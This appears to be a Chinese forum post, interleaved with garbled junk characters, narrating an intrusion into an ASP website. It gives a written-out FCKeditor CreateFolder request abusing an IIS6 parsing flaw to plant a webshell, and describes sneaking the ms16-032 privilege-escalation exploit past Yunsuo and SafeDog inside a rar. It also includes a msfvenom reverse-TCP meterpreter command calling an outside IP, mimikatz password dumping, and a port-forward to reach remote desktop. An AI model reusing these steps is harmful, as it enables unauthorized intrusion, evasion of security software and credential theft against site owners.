|
4 o/ w! B( X/ c( \3 A- j0 @1 t & l& n0 `7 }0 S/ X. c+ \& `8 i/ R
7 h( X9 S% N1 q! r4 | * J* m8 L; `+ ^2 u! L. G
|
0 m& f7 |' c6 f5 [9 S2 w# M' o) c
3 ]4 S6 Q; s4 Y+ k7 ]. t7 W7 f
2 }1 S3 Q" |% B/ O0 |3 r1 Q+ D Q一、 利用getwebshell篇
7 ^; z+ ^, ]9 `. G7 v* d- A/ \1 E/ N
" G; N5 N* p5 `; S2 V首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: ; i1 X2 E% D4 j4 L- X% _

( \: {2 h( x% W; w9 q3 w" f3 M/ r $ l! F, ~$ p, @0 P
下面进后台发现有fckeditor,而且还是iis6.0的,可以考虑创建个asp目录来构造解析(fck编辑器路径被改成别的需要burpsuite抓包的时候看到)
# Q0 ^9 D* ^4 ?; Q
2 i& ?2 w5 ^, U9 ~& d$ ~0 m2 @下面我们构造一个asp目录,如: & w" z) N, b! u; l' }3 W5 G
8 m1 J. E- D. G) P/ \, m V
. L$ G+ I7 i" I http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
$ d% }& A1 h6 K! x8 \ 6 ^: Z$ K8 i& _' E, q. W
m" S* Q0 p- X0 I
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。
$ n$ \) ^$ L0 o5 e; p ! T2 f, y8 C4 K
一、 绕过安全狗云锁提权并且加账号 $ ~5 A: j2 r5 Z7 b4 p1 w
 ! z W' Q9 X& \* G& {7 T" B6 Q
没法看系统信息,但是根据网站404页面可以断定是2003服务器,然后接着访问C:\Program Files (x86)存在断定是2003 64位系统,那么我们说干就干,我们上传ms16-032 64位直接干,但是发现上传exe或者别的格式exp会自动消失,看进程也没杀毒呀,没错没杀毒,是云锁有个功能防御了,那么突破云锁上传的方法就是利用rar,先把exp打包为64.rar上传,然后我们翻一下rar在哪个目录,在C:\Program Files (x86),然后开干 & v4 W' I M! U9 m
) g; U# v' `2 ^5 L" h* H9 m
如图: , b( E( w8 I$ R& W |! A
 " C. \! B: M m. G( A
然后执行直接是system权限,然后我用干狗神器给加了一个账号用tunna反弹3968提示不是远程组,我操后来也想着用getpassword64抓明文密码,但是一执行就卡死,没办法想到了metasploit
" w, N( p& ~ k- q2 j4 \& @
( n7 ?, g# A$ B% p5 J6 x8 c& s一、 利用metasploit ' J. G% E+ S. J% `5 n6 `) ^ s
. x9 b& h6 ?8 ~: l# O) k* @$ L# J
首先用pentestbox生成一个64位的payload如下命令
) e9 [! t* H2 q. k/ e {1 `
0 K! p8 U+ z% l. w/ V7 \0 VmsfVENOM -p windows/x64meterpreter/reverse_tcp lhost=42.51.1.1 lport=443 -f exe > c:\mata.exe % U4 |4 R* d# S( }( |8 _7 z
2 d; t9 B1 y" u$ X( ?8 k2 K" p
为什么要用443端口,之前我测试用别的端口直接被墙了没法上线,下面我们在system下执行这个mata,上线如图:
- r; k! [7 E+ M& l ( g0 t3 t0 M) M+ z% T/ s
下面我们用这个命令抓一下明文密码命令1:use mimikatz 命令2:kerberos如下图: / w! X! M5 x. z D' t5 b) y) b! @

% }4 X4 i% O, p% W下面我们来做一个监听如下命令: ; Z8 v) y. F8 r+ j1 W0 A1 d, v
2 B; D$ |3 o' P. w& F* u3 V5 d1 Y0 l
portfwd add -l 6655 -p 3968 -r 127.0.0.1,这个命令的意思就是把目标服务器的远程3968转发到pentestbox的公网IP的6655端口如图:
5 O! d/ D8 S- C9 V3 F 2 j/ Z1 s6 C. v. U% u
* i. V e, T' g7 d+ v3 w5 m |
& d. b" y2 r# X. Q0 O
! k) x S7 _! \( H7 q4 p 0 H0 u$ n9 p$ W4 o& x0 D
; `9 Y% | H/ `- [0 _
8 n; q) Z: a9 R+ E, b& o. B5 X0 E; }$ {# V
. c! G6 j( U. {# e W2 j( A; C
% p- ], D6 s6 z' @( B* O) e9 Q; s ( T% F4 @' q6 N7 w6 I2 v/ f- _! A
0 K' @( r" g4 v9 h
( e. D. F* e" {2 Q
8 u! l y" u0 s5 ^8 y' g
8 k6 J; Q& v6 t* ~- A+ O
+ f& l1 }+ [" n |